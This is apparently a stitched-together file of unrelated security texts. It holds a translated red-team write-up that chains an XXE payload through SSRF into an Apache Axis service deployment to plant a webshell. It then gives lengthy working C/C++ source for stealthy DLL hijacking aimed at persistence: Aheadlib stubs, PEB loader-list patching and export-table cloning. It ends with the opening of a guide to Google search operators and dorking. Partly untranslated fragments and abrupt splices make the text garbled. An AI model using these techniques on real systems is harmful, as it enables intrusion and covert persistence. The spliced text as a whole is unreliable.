In Java, the classes that commonly lead to XXE include:
SAXBuilder
SAXParserFactory
SAXReader
SAXTransformerFactory
TransformerFactory
ValidatorSample
XMLReader
Unmarshaller
SchemaFactory
.....
The audit finally turned up one XXE caused by SAXBuilder.
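For context, a minimal sketch of the vulnerable pattern and a hardened variant (the org.jdom2 package is an assumption here — the audit only identified the class as SAXBuilder):

import java.io.StringReader;
import org.jdom2.Document;
import org.jdom2.input.SAXBuilder;

public class XxeSketch {
    // Vulnerable: default settings resolve external entities in attacker-supplied XML.
    public static Document parseUnsafe(String userXml) throws Exception {
        return new SAXBuilder().build(new StringReader(userXml));
    }

    // Hardened: refuse DOCTYPE declarations outright (standard Xerces feature).
    public static Document parseHardened(String userXml) throws Exception {
        SAXBuilder builder = new SAXBuilder();
        builder.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        return builder.build(new StringReader(userXml));
    }
}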
Build a payload and test it against dnslog. Payload:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE b [<!ENTITY xxe SYSTEM "http://127.0.0.1:8041/?hello">]><name>&xxe;</name>
Got the callback — the SSRF works. From here exploitation is fairly convenient: this system's install paths are uniform, the public gadget chains all require third-party jars and LogHandler is a pain, so instead I looked for a file-write method among the application's built-in classes. FileUtil has a writeFileContent method that writes a file directly.
Use the SSRF to issue the GET request that registers the method with the web services. "The port may differ!" (Just convert the POST format to GET.)
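The deployment descriptor sent to Axis's AdminService looks roughly like this (the service name and class name below are placeholders — the audit used the application's own FileUtil; this is a sketch of the well-known technique from the seebug article above, not the exact request used):

<deployment xmlns="http://xml.apache.org/axis/wsdd/"
            xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">
  <service name="DemoService" provider="java:RPC">
    <parameter name="className" value="com.example.app.util.FileUtil"/>
    <parameter name="allowedMethods" value="*"/>
  </service>
</deployment>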
The method was successfully added to the Web Services.
Invoke the method, write the file — webshell obtained!
Automated Universal DLL Hijacking
I previously wrote an article on using the "white-plus-black" technique to generate "assault" payloads (冲锋马), which used some DLL hijacking. In that scenario, however, the hijack blocks the legitimate white file from running and hands control over to the "black" payload.
This article is a study of universal DLL hijacking. The goal is a generic DLL that hijacks a program's original DLL while preserving the original DLL's functionality and simultaneously running our own code — ideally generated automatically (no manual compilation), mainly for persistence scenarios.
Existing research
Aheadlib
The well-known tool Aheadlib can directly generate forwarding-style DLL hijack source code, using #pragma comment(linker, "/EXPORT:") to declare export-table forwarding.
(The earlier article referenced above: 红队开发 - 白加黑自动化生成器.md - 小草窝博客, x.hacking8.com.)
Source generated in forwarding mode is the first listing below. In Aheadlib's "just-in-time call" mode (the second, longer listing), every exported function instead jumps through a globally saved address; when the DLL initializes, it resolves the original DLL and fills in these addresses one by one.
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Headers
#include <Windows.h>
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Exported functions (forwarded to the renamed original DLL)
#pragma comment(linker, "/EXPORT:Box=testOrg.Box,@1")
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Entry point
BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved)
{
    if (dwReason == DLL_PROCESS_ATTACH)
    {
        DisableThreadLibraryCalls(hModule);
    }
    else if (dwReason == DLL_PROCESS_DETACH)
    {
    }

    return TRUE;
}
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Headers
#include <Windows.h>
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Exported functions
#pragma comment(linker, "/EXPORT:Box=_AheadLib_Box,@1")
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Pointer to the original function's address
PVOID pfnBox;
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Macros
#define EXTERNC extern "C"
#define NAKED __declspec(naked)
#define EXPORT __declspec(dllexport)
#define ALCPP EXPORT NAKED
#define ALSTD EXTERNC EXPORT NAKED void __stdcall
#define ALCFAST EXTERNC EXPORT NAKED void __fastcall
#define ALCDECL EXTERNC NAKED void __cdecl
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// AheadLib namespace
namespace AheadLib
{
    HMODULE m_hModule = NULL;   // handle of the original module
    DWORD m_dwReturn[1] = {0};  // return address of the original function

    // Get the address of an original function
    FARPROC WINAPI GetAddress(PCSTR pszProcName)
    {
        FARPROC fpAddress;
        CHAR szProcName[16];
        TCHAR tzTemp[MAX_PATH];

        fpAddress = GetProcAddress(m_hModule, pszProcName);
        if (fpAddress == NULL)
        {
            if (HIWORD(pszProcName) == 0)
            {
                wsprintfA(szProcName, "%d", pszProcName);
                pszProcName = szProcName;
            }

            wsprintf(tzTemp, TEXT("Could not find function %hs; the program cannot run."), pszProcName);
            MessageBox(NULL, tzTemp, TEXT("AheadLib"), MB_ICONSTOP);
            ExitProcess(-2);
        }

        return fpAddress;
    }

    // Initialize the original function address pointers
    inline VOID WINAPI InitializeAddresses()
    {
        pfnBox = GetAddress("Box");
    }

    // Load the original module
    inline BOOL WINAPI Load()
    {
        TCHAR tzPath[MAX_PATH];
        TCHAR tzTemp[MAX_PATH * 2];

        lstrcpy(tzPath, TEXT("testOrg.dll"));
        m_hModule = LoadLibrary(tzPath);
        if (m_hModule == NULL)
        {
            wsprintf(tzTemp, TEXT("Could not load %s; the program cannot run."), tzPath);
            MessageBox(NULL, tzTemp, TEXT("AheadLib"), MB_ICONSTOP);
        }
        else
        {
            InitializeAddresses();
        }

        return (m_hModule != NULL);
    }

    // Free the original module
    inline VOID WINAPI Free()
    {
        if (m_hModule)
        {
            FreeLibrary(m_hModule);
        }
    }
}
using namespace AheadLib;
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Entry point
BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved)
{
    if (dwReason == DLL_PROCESS_ATTACH)
    {
        DisableThreadLibraryCalls(hModule);
        return Load();
    }
    else if (dwReason == DLL_PROCESS_DETACH)
    {
        Free();
    }
It also has drawbacks: the exported stubs use inline assembly to jump through an address, which is unavailable in x64 builds, and the style feels inelegant.
Still, the source Aheadlib generates compiles into something quite universal, suitable both for import-table (static) DLL loading and for LoadLibrary-based hijacks.

易语言 DLL hijack generator

The source this tool generates looks more concise than Aheadlib's: it LoadLibrary's the original DLL, uses GetProcAddress to obtain both the original DLL's function addresses and its own, and writes jmp-to-original machine code directly at its own functions' addresses.
This is cleaner than the code above; rewritten in C, with the relative offset computed, x64 should work too (a C sketch of this idea appears after the listing fragment below). But it still depends on generating source code and then compiling it.

A study of a universal DLL hijacking technique

From: (see the 52pojie link below)
By analysing LoadLibraryW's call stack and the relevant source, the author reached the conclusion quoted below.
The test code is simple:
return TRUE;
}
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// 导出函数
ALCDECL AheadLib_Box(void)
{
__asm JMP pfnBox;
}
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
https://www.52pojie.cn/forum.php?mod=viewthread&tid=830796
Go straight at peb->ldr and walk the module list to find the target DLL's LdrEntry — that is the entry that needs modifying; patching it gives a universal DLL hijack.
GitHub address: (the repository link appears below the listing)
I streamlined this code a little and also added x64 support (the optimized version is the second listing below):
void* NtCurrentPeb()
{
__asm {
mov eax, fs:[0x30];
}
}
PEB_LDR_DATA* NtGetPebLdr(void* peb)
{
__asm {
mov eax, peb;
mov eax, [eax + 0xc];
}
}
VOID SuperDllHijack(LPCWSTR dllname, HMODULE hMod)
{
WCHAR wszDllName[100] = { 0 };
void* peb = NtCurrentPeb();
PEB_LDR_DATA* ldr = NtGetPebLdr(peb);
for (LIST_ENTRY* entry = ldr->InLoadOrderModuleList.Blink;
entry != (LIST_ENTRY*)(&ldr->InLoadOrderModuleList);
entry = entry->Blink) {
PLDR_DATA_TABLE_ENTRY data = (PLDR_DATA_TABLE_ENTRY)entry;
memset(wszDllName, 0, 100 * 2);
memcpy(wszDllName, data->BaseDllName.Buffer, data->BaseDllName.Length);
if (!_wcsicmp(wszDllName, dllname)) {
data->DllBase = hMod;
break;
}
}
}
VOID DllHijack(HMODULE hMod)
{
TCHAR tszDllPath[MAX_PATH] = { 0 };
GetModuleFileName(hMod, tszDllPath, MAX_PATH);
PathRemoveFileSpec(tszDllPath);
PathAppend(tszDllPath, TEXT("mydll.dll.1"));
HMODULE hMod1 = LoadLibrary(tszDllPath);
SuperDllHijack(L"mydll.dll", hMod1);
}
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
DllHijack(hModule);
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
https://github.com/anhkgg/SuperDllHijack
A drawback: this approach only covers DLLs loaded dynamically via LoadLibrary.
In the project's issues someone also discussed stealthiness —
a nice idea, so it is shown here as well (the issue link follows the listing).
#include "pch.h"
#include <stdio.h>
#include <iostream>
#include <winternl.h>
void SuperDllHijack(LPCWSTR dllname)
{
#if defined(_WIN64)
auto peb = PPEB(__readgsqword(0x60));
#else
auto peb = PPEB(__readfsdword(0x30));
#endif
auto ldr = peb->Ldr;
auto lpHead = &ldr->InMemoryOrderModuleList;
auto lpCurrent = lpHead;
while ((lpCurrent = lpCurrent->Blink) != lpHead)
{
PLDR_DATA_TABLE_ENTRY dataTable = CONTAINING_RECORD(lpCurrent, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
WCHAR wszDllName[100] = { 0 };
memset(wszDllName, 0, 100 * 2);
memcpy(wszDllName, dataTable->FullDllName.Buffer, dataTable->FullDllName.Length);
if (_wcsicmp(wszDllName, dllname) == 0) {
HMODULE hMod1 = LoadLibrary(TEXT("test.dll.1"));
dataTable->DllBase = hMod1;
break;
}
}
}
BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
WCHAR ourPath[MAX_PATH];
GetModuleFileNameW(hModule, ourPath, MAX_PATH);
SuperDllHijack(ourPath);
MessageBox(NULL, TEXT("劫持成功"), TEXT("1"), MB_OK);
}
return TRUE;
}
https://github.com/anhkgg/SuperDllHijack/issues/5
Adaptive DLL hijacking

An article by a foreign researcher; original:
https://www.netspi.com/blog/technical/adversary-simulation/adaptive-dll-hijacking/
It studies a "universal" DLL that adapts to the various hijacking situations, and publishes a tool on GitHub:
https://github.com/monoxgas/Koppeling
The article's treatment of the underlying mechanics is fairly thorough.
For a statically loaded DLL (one referenced in the import table), the call stack looks like this:
对于导出表的函数地址,是在修补时完成并写⼊ peb→ldr 中的,这部分可以动态修改。
那么如何⾃动化实现对于静态加载 dll 的通⽤劫持呢,
做了⼀个导出表克隆⼯具,在编译好了
的⾃适应 dll 后,可以⽤
这个导出表克隆⼯具把要劫持的 dll 的导出表复制到这个 dll 上,在 dllmain 初始化时修补 IAT 从⽽实现正常加载。
对于动态加载(使⽤ LoadLibrary)的 dll,它的调⽤堆栈如下
https://www.netspi.com/blog/technical/adversary-simulation/adaptive-dll-hijacking/
https://github.com/monoxgas/Koppeling
1
2
3
4
5
6
7
8
ntdll!LdrInitializeThunk <- 新进程启动
ntdll!LdrpInitialize
ntdll!_LdrpInitialize
ntdll!LdrpInitializeProcess
ntdll!LdrpInitializeGraphRecurse <- 依赖分析
ntdll!LdrpInitializeNode
ntdll!LdrpCallInitRoutine
evil!DllMain <- 执行的函数
Koppeling
Koppeling
C++
使⽤ LoadLibrary 加载的 dll,系统是没有检查它的导出表的,但是使⽤ GetProcAddress 后,会从导出表中获取函数。
的做法是在初始化后,将被劫持 dll 的导出表克隆⼀份,将⾃身导出表地址修改为克隆的地址。
相关代码如下,
1
2
3
4
5
6
7
8
9
KernelBase!LoadLibraryExW <- 调用loadlibrary
ntdll!LdrLoadDll
ntdll!LdrpLoadDll
ntdll!LdrpLoadDllInternal
ntdll!LdrpPrepareModuleForExecution
ntdll!LdrpInitializeGraphRecurse <- 依赖图构建
ntdll!LdrpInitializeNode
ntdll!LdrpCallInitRoutine
evil!DllMain <- 执行初始化函数
Koppeling
///
// 4 - Clone our export table to match the target DLL (for GetProcAddress)
///
auto ourHeaders = (PIMAGE_NT_HEADERS)(ourBase + PIMAGE_DOS_HEADER(ourBase)->e_lfanew);
auto ourExportDataDir = &ourHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
if (ourExportDataDir->Size == 0)
return FALSE; // Our DLLs doesn't have any exports
auto ourExportDirectory = PIMAGE_EXPORT_DIRECTORY(ourBase + ourExportDataDir->VirtualAddress);
// Make current header data RW for redirections
DWORD oldProtect = 0;
if (!VirtualProtect(
ourExportDirectory,
sizeof(PIMAGE_EXPORT_DIRECTORY), PAGE_READWRITE,
&oldProtect)) {
return FALSE;
}
DWORD totalAllocationSize = 0;
// Add the size of jumps
totalAllocationSize += targetExportDirectory->NumberOfFunctions * (sizeof(jmpPrefix) + sizeof(jmpRax) + sizeof(LPVOID));
// Add the size of function table
totalAllocationSize += targetExportDirectory->NumberOfFunctions * sizeof(INT);
// Add total size of names
PINT targetAddressOfNames = (PINT)((PBYTE)targetBase + targetExportDirectory->AddressOfNames);
for (DWORD i = 0; i < targetExportDirectory->NumberOfNames; i++)
totalAllocationSize += (DWORD)strlen(((LPCSTR)((PBYTE)targetBase + targetAddressOfNames[i]))) + 1;
// Add size of name table
totalAllocationSize += targetExportDirectory->NumberOfNames * sizeof(INT);
// Add the size of ordinals:
totalAllocationSize += targetExportDirectory->NumberOfFunctions * sizeof(USHORT);
// Allocate usuable memory for rebuilt export data
PBYTE exportData = AllocateUsableMemory((PBYTE)ourBase, totalAllocationSize, PAGE_READWRITE);
if (!exportData)
return FALSE;
PBYTE sideAllocation = exportData; // Used for VirtualProtect later
// Copy Function Table
PINT newFunctionTable = (PINT)exportData;
CopyMemory(newFunctionTable, (PBYTE)targetBase + targetExportDirectory->AddressOfNames, targetExportDirectory->Nu
mberOfFunctions * sizeof(INT));
exportData += targetExportDirectory->NumberOfFunctions * sizeof(INT);
ourExportDirectory->AddressOfFunctions = DWORD((PBYTE)newFunctionTable - (PBYTE)ourBase);
// Write JMPs and update RVAs in the new function table
PINT targetAddressOfFunctions = (PINT)((PBYTE)targetBase + targetExportDirectory->AddressOfFunctions);
for (DWORD i = 0; i < targetExportDirectory->NumberOfFunctions; i++) {
newFunctionTable[i] = DWORD((exportData - (PBYTE)ourBase));
CopyMemory(exportData, jmpPrefix, sizeof(jmpPrefix));
exportData += sizeof(jmpPrefix);
PBYTE realAddress = (PBYTE)((PBYTE)targetBase + targetAddressOfFunctions[i]);
CopyMemory(exportData, &realAddress, sizeof(LPVOID));
exportData += sizeof(LPVOID);
CopyMemory(exportData, jmpRax, sizeof(jmpRax));
exportData += sizeof(jmpRax);
}
// Copy Name RVA Table
PINT newNameTable = (PINT)exportData;
CopyMemory(newNameTable, (PBYTE)targetBase + targetExportDirectory->AddressOfNames, targetExportDirectory->Number
OfNames * sizeof(DWORD));
exportData += targetExportDirectory->NumberOfNames * sizeof(DWORD);
ourExportDirectory->AddressOfNames = DWORD(((PBYTE)newNameTable - (PBYTE)ourBase));
// Copy names and apply delta to all the RVAs in the new name table
for (DWORD i = 0; i < targetExportDirectory->NumberOfNames; i++) {
PBYTE realAddress = (PBYTE)((PBYTE)targetBase + targetAddressOfNames[i]);
DWORD length = (DWORD)strlen((LPCSTR)realAddress);
CopyMemory(exportData, realAddress, length);
newNameTable[i] = DWORD((PBYTE)exportData - (PBYTE)ourBase);
exportData += (ULONG_PTR)length + 1;
}
// Copy Ordinal Table
PINT newOrdinalTable = (PINT)exportData;
CopyMemory(newOrdinalTable, (PBYTE)targetBase + targetExportDirectory->AddressOfNameOrdinals, targetExportDirecto
ry->NumberOfFunctions * sizeof(USHORT));
exportData += targetExportDirectory->NumberOfFunctions * sizeof(USHORT);
ourExportDirectory->AddressOfNameOrdinals = DWORD((PBYTE)newOrdinalTable - (PBYTE)ourBase);
if (!VirtualProtect(
ourExportDirectory,
sizeof(PIMAGE_EXPORT_DIRECTORY), oldProtect,
&oldProtect)) {
return FALSE;
}
if (!VirtualProtect(
sideAllocation,
totalAllocationSize,
PAGE_EXECUTE_READ,
&oldProtect)) {
return FALSE;
} | pdf |
The Google Hacker’s Guide
Understanding and Defending Against
the Google Hacker
by Johnny Long
[email protected]
http://johnny.ihackstuff.com
GOOGLE SEARCH TECHNIQUES................................................................................................................ 3
GOOGLE WEB INTERFACE................................................................................................................................... 3
BASIC SEARCH TECHNIQUES .............................................................................................................................. 7
GOOGLE ADVANCED OPERATORS ........................................................................................................... 9
ABOUT GOOGLE’S URL SYNTAX .................................................................................................................... 12
GOOGLE HACKING TECHNIQUES........................................................................................................... 13
DOMAIN SEARCHES USING THE ‘SITE’ OPERATOR........................................................................................... 13
FINDING ‘GOOGLETURDS’ USING THE ‘SITE’ OPERATOR................................................................................. 14
SITE MAPPING: MORE ABOUT THE ‘SITE’ OPERATOR...................................................................................... 15
FINDING DIRECTORY LISTINGS........................................................................................................................ 16
VERSIONING: OBTAINING THE WEB SERVER SOFTWARE / VERSION............................................................. 17
via directory listings ................................................................................................................................... 17
via default pages ......................................................................................................................................... 19
via manuals, help pages and sample programs......................................................................................... 21
USING GOOGLE TO FIND INTERESTING FILES AND DIRECTORIES .................................................................... 23
inurl: searches............................................................................................................................................. 23
filetype:........................................................................................................................................................ 24
combination searches ................................................................................................................................. 24
ws_ftp.log file searches............................................................................................................................... 24
USING SOURCE CODE TO FIND VULNERABLE TARGETS .................................................................................. 25
USING GOOGLE AS A CGI SCANNER................................................................................................................ 28
ABOUT GOOGLE AUTOMATED SCANNING.......................................................................................... 30
OTHER GOOGLE STUFF .............................................................................................................................. 31
GOOGLE APPLIANCES ...................................................................................................................................... 31
GOOGLEDORKS................................................................................................................................................. 31
GOOSCAN ......................................................................................................................................................... 32
GOOPOT ........................................................................................................................................................... 32
GOOGLE SETS................................................................................................................................................... 34
A WORD ABOUT HOW GOOGLE FINDS PAGES (OPERA)................................................................. 35
PROTECTING YOURSELF FROM GOOGLE HACKERS...................................................................... 35
THANKS AND SHOUTS.................................................................................................................................. 36
The Google Hacker’s Guide
[email protected]
http://johnny.ihackstuff.com
- Page 3 -
The Google search engine found at www.google.com offers many different features
including language and document translation, web, image, newsgroups, catalog and
news searches and more. These features offer obvious benefits to even the most
uninitiated web surfer, but these same features allow for far more nefarious possibilities
to the most malicious Internet users including hackers, computer criminals, identity
thieves and even terrorists. This paper outlines the more nefarious applications of the
Google search engine, techniques that have collectively been termed “Google hacking.”
The intent of this paper is to educate web administrators and the security community in
the hopes of eventually securing this form of information leakage.
This document outlines the techniques that Google hackers can employ. This document
does not serve as a clearinghouse for all known techniques or searches. The
googledorks database, located at http://johnny.ihackstuff.com should be consulted for
information on all known attack searches.
Google search techniques
Google web interface
The Google search engine is fantastically easy to use. Despite the simplicity, it is very
important to have a firm grasp of these basic techniques in order to fully comprehend the
more advanced uses. The most basic Google search can involve a single word entered
into the search page found at www.google.com.
Figure 1: The main Google search page
As shown in Figure 1, I have entered the word “sardine” into the search screen. Figure 1
shows many of the options available from the www.google.com front page.
The Google toolbar
The Internet Explorer browser I am using has a Google
“toolbar” (a free download from toolbar.google.com) installed
and presented under the address bar. Although the toolbar
offers many different features, it is not a required element for
performing advanced searches. Even the most advanced
search functionality is available to any user able to access the
www.google.com web page with any type of browser, including
text-based and mobile browsers.
“Web, Images,
Groups, Directory and
News” tabs
These tabs allow you to search web pages, photographs,
message group postings, Google directory listings, and news
stories respectively. First-time Google users should consider
that these tabs are not always a replacement for the “Submit
Search” button.
Search term input field
Located directly below the alternate search tabs, this text field
allows the user to enter a Google search term. Search term
rules will be described later.
“Submit Search”
This button submits the search term supplied by the user. In
many browsers, simply pressing the “Enter/Return” key after
typing a search term will activate this button.
“I’m Feeling Lucky”
Instead of presenting a list of search results, this button will
forward the user to the highest-ranked page for the entered
search term. Often times, this page is the most relevant page
for the entered search term.
“Advanced Search”
This link takes the user to the “Advanced Search” page as
shown in Figure 2. Much of the advanced search functionality is
accessible from this page. Some advanced features are not
listed on this page.
“Preferences”
This link allows the user to select several options (which are
stored in cookies on the user’s machine for later retrieval)
including languages, filters, number of results per page, and
window options.
“Language tools”
This link allows the user to set many different language options
and translate text to and from various languages.
Figure 2: Advanced Search page
Once a user submits a search by clicking the “Submit Search” button or by pressing
enter in the search term input box, a results page may be displayed as shown in Figure
3.
Figure 3: A basic Google search results page.
The search results page allows the user to explore the search results in various ways.
Top line
The top line (found under the alternate search tabs) lists the
search query, the number of hits displayed and found, and
how long the search took.
“Category” link
This link takes you to the Google directory category for the
search you entered. The Google directory is a highly
organized directory of the web pages that Google monitors.
Main page link
This link takes you directly to a web page. Figure 3 shows
this as “Sardine Factory :: Home page”
Description
The short description of a site
Cached link
This link takes you to Google’s copy of this web page. This
is very handy if a web page changes or goes down.
“Similar Pages”
This link takes to you similar pages based on the Google
category.
“Sponsored Links”
coluimn
This column lists pay targeted advertising links based on
your search query.
Under certain circumstances, a blank error page (See Figure 4) may be presented
instead of the search results page. This page is the catchall error page, which generally
means Google encountered a problem with the submitted search term. Many times this
means that a search query option was not entered properly.
Figure 4: The "blank" error page
In addition to the “blank” error page, another error page may be presented as shown in
Figure 5. This page is much more descriptive, informing the user that a search term was
missing. This message indicates that the user needs to add to the search query.
Figure 5: Another Google error page
There is a great deal more to Google’s web-based search functionality which is not
covered in this paper.
Basic search techniques
Simple word searches
Basic Google searches, as I have already presented, consist of one or more
words entered without any quotations or the use of special keywords. Examples:
peanut butter
butter peanut
olive oil popeye
‘+’ searches
When supplying a list of search terms, Google automatically tries to find every
word in the list of terms, making the Boolean operator “AND” redundant. Some
search engines may use the plus sign as a way of signifying a Boolean “AND”.
Google uses the plus sign in a different fashion. When Google receives a basic
search request that contains a very common word like “the”, “how” or “where”,
the word will often times be removed from the query as shown in Figure 6.
Figure 6: Google removing overly common words
In order to force Google to include a common word, precede the search term with
a plus (+) sign. Do not use a space between the plus sign and the search term.
For example, the following searches produce slightly different results:
where quick brown fox
+where quick brown fox
The ‘+’ operator can also be applied to Google advanced operators, discussed
below.
‘-‘ searches
Excluding a term from a search query is as simple as placing a minus sign (-)
before the term. Do not use a space between the minus sign and the search
term. For example, the following searches produce slightly different results:
quick brown fox
quick –brown fox
The ‘-’ operator can also be applied to Google advanced operators, discussed
below.
Phrase Searches
In order to search for a phrase, supply the phrase surrounded by double-quotes.
Examples:
“the quick brown fox”
“liberty and justice for all”
“harry met sally”
Arguments to Google advanced operators can be phrases enclosed in quotes, as
described below.
Mixed searches
Mixed searches can involve both phrases and individual terms. Example:
macintosh "microsoft office"
This search will only return results that include the phrase “Microsoft office” and
the term macintosh.
Google advanced operators
Google allows the use of certain operators to help refine searches. The use of advanced
operators is very simple as long as attention is given to the syntax. The basic format is:
operator:search_term
Notice that there is no space between the operator, the colon and the search term. If a
space is used after a colon, Google will display an error message. If a space is used
before the colon, Google will use your intended operator as a search term.
Some advanced operators can be used as a standalone query. For example
‘cache:www.google.com’ can be submitted to Google as a valid search query. The
‘site’ operator, by contrast, must be used along with a search term, such as
‘site:www.google.com help’.
Table 1: Advanced Operator Summary

Operator    Description                                                    Additional search argument required?
site:       find search term only on site specified by search_term         YES
filetype:   search documents of type search_term                           YES
link:       find sites containing search_term as a link                    NO
cache:      display the cached version of page specified by search_term    NO
intitle:    find sites containing search_term in the title of a page       NO
inurl:      find sites containing search_term in the URL of the page       NO
site: find web pages on a specific web site
This advanced operator instructs Google to restrict a search to a specific web site or
domain. When using this operator, an additional search argument is required.
Example:
site:harvard.edu tuition
This query will return results from harvard.edu that include the term tuition anywhere on
the page.
filetype: search only within files of a specific type.
This operator instructs Google to search only within the text of a particular type of file.
This operator requires an additional search argument.
Example:
filetype:txt endometriosis
This query searches for the word ‘endometriosis’ within standard text documents. There
should be no period (.) before the filetype and no space around the colon following the
word "filetype". It is important to note that Google only claims to be able to search within
certain types of files. Based on my experience, Google can search within most files that
present as plain text. For example, Google can easily find a word within a file of type
“.txt,” “.html” or “.php” since the output of these files in a typical web browser window is
textual. By contrast, while a WordPerfect document may look like text when opened with
the WordPerfect application, that type of file is not recognizable to the standard web
browser without special plugins and by extension, Google can not interpret the
document properly, making a search within that document impossible. Thankfully,
Google can search within specific type of special files, making a search like
“filetype:doc endometriosis“ a valid one.
The current list of files that Google can search is listed in the filetype FAQ located at
http://www.google.com/help/faq_filetypes.html. As of this writing, Google can search
within the following file types:
• Adobe Portable Document Format (pdf)
• Adobe PostScript (ps)
• Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
• Lotus WordPro (lwp)
• MacWrite (mw)
• Microsoft Excel (xls)
• Microsoft PowerPoint (ppt)
• Microsoft Word (doc)
• Microsoft Works (wks, wps, wdb)
• Microsoft Write (wri)
• Rich Text Format (rtf)
• Text (ans, txt)
link: search within links
The hyperlink is one of the cornerstones of the Internet. A hyperlink is a selectable
connection from one web page to another. Most often, these links appear as underlined
text but they can appear as images, video or any other type of multimedia content. This
advanced operator instructs Google to search within hyperlinks for a search term. This
operator requires no other search arguments.
Example:
link:www.apple.com
This query would display web pages that link to Apple.com’s main page. This
special operator is somewhat limited in that the link must appear exactly as entered in
the search query. The above query would not find pages that link to
www.apple.com/ipod, for example.
cache: display Google’s cached version of a page
This operator displays the version of a web page as it appeared when Google crawled
the site. This operator requires no other search arguments.
Example:
cache:johnny.ihackstuff.com
cache:http://johnny.ihackstuff.com
These queries would display the cached version of Johnny’s web page. Note that both of
these queries return the same result. I have discovered, however, that sometimes
queries formed like these may return different results, with one result being the dreaded
“cache page not found” error. This operator also accepts whole URL lines as arguments.
intitle: search within the title of a document
This operator instructs Google to search for a term within the title of a document. Most
web browsers display the title of a document on the top title bar of the browser window.
This operator requires no other search arguments.
Example:
intitle:gandalf
This query would only display pages that contained the word ‘gandalf’ in the title. A
derivative of this operator, ‘allintitle’ works in a similar fashion.
Example:
allintitle:gandalf silmarillion
This query finds both the words ‘gandalf’ and ‘silmarillion’ in the title of a page. The
‘allintitle’ operator instructs Google to find every subsequent word in the query only in the
title of the page. This is equivalent to a string of individual ‘intitle’ searches.
inurl: search within the URL of a page
This operator instructs Google to search only within the URL, or web address of a
document. This operator requires no other search arguments.
Example:
inurl:amidala
This query would display pages with the word ‘amidala’ inside the web address. One
returned result, ‘http://www.yarwood.org/kell/amidala/’ contains the word
‘amidala’ as the name of a directory. The word can appear anywhere within the web
address, including the name of the site or the name of a file. A derivative of this operator,
‘allinurl’ works in a similar fashion.
Example:
allinurl:amidala gallery
This query finds both the words ‘amidala’ and ‘gallery’ in the URL of a page. The ‘allinurl’
operator instructs Google to find every subsequent word in the query only in the URL of
the page. This is equivalent to a string of individual ‘inurl’ searches.
For a complete list of advanced operators and their usage, see
http://www.google.com/help/operators.html.
About Google’s URL syntax
The advanced Google user often times streamlines the search process by use of the
Google toolbar (not discussed here) or through direct use of Google URL’s. For
example, consider the URL generated by the web search for sardine:
http://www.google.com/search?hl=en&ie=UTF-8&oe=UTF-8&q=sardine
First, notice that the base URL for a Google search is “http://www.google.com/search”. The question mark denotes the end of the URL
and the beginning of the arguments to the “search” program. The “&” symbol separates
arguments. The URL presented to the user may vary depending on many factors
including whether or not the search was submitted via the toolbar, the native language of
the user, etc. Arguments to the Google search program are well documented at
http://www.google.com/apis. The arguments found in the above URL are as follows:
hl: Native language results, in this case “en” or English.
ie: Input encoding, the format of incoming data. In this case “UTF-8”.
oe: Output encoding, the format of outgoing data. In this case “UTF-8”.
q:  Query. The search query submitted by the user. In this case “sardine”.
Most of the arguments in this URL can be omitted, making the URL much more concise.
For example, the above URL can be shortened to
http://www.google.com/search?q=sardine
Additional search terms can be appended to the
URL with the plus sign. For example, to search for “sardine” along with “peanut” and
“butter,” consider using this URL:
http://www.google.com/search?q=sardine+peanut+butter
Since simplified Google URLs are simple to read and portable, they are often used as a
way to represent a Google search.
Google (and many other web-based programs) must represent special characters like
quotation marks in a URL with a hexadecimal number preceded by a percent (%) sign in
order to follow the http URL standard. For example, a search for “the quick brown fox”
(paying special attention to the quotation marks) is represented as
http://www.google.com/search?&q=%22the+quick+brown+fox%22
In this example, a double quote is displayed as “%22” and spaces are replaced by plus
(+) signs. Google does not exclude overly common words from phrase searches. Overly
common words are automatically included when enclosed in double-quotes.
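As a rough illustration of this encoding, the short Python sketch below builds a phrase-search URL using only the standard library. The helper name build_phrase_url is mine, not part of any Google tooling:

from urllib.parse import quote_plus

def build_phrase_url(phrase):
    # quote_plus percent-encodes the double quotes as %22 and turns
    # spaces into plus signs, matching the URL format shown above.
    return "http://www.google.com/search?q=" + quote_plus('"' + phrase + '"')

print(build_phrase_url("the quick brown fox"))
# prints http://www.google.com/search?q=%22the+quick+brown+fox%22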
Google hacking techniques
Domain searches using the ‘site’ operator
The site operator can be expanded to search out entire domains. For example:
site:gov secret
This query searches every web site in the .gov domain for the word ‘secret’. Notice that
the site operator works on addresses in reverse. For example, Google expects the site
operator to be used like this:
site:www.cia.gov
site:cia.gov
site:gov
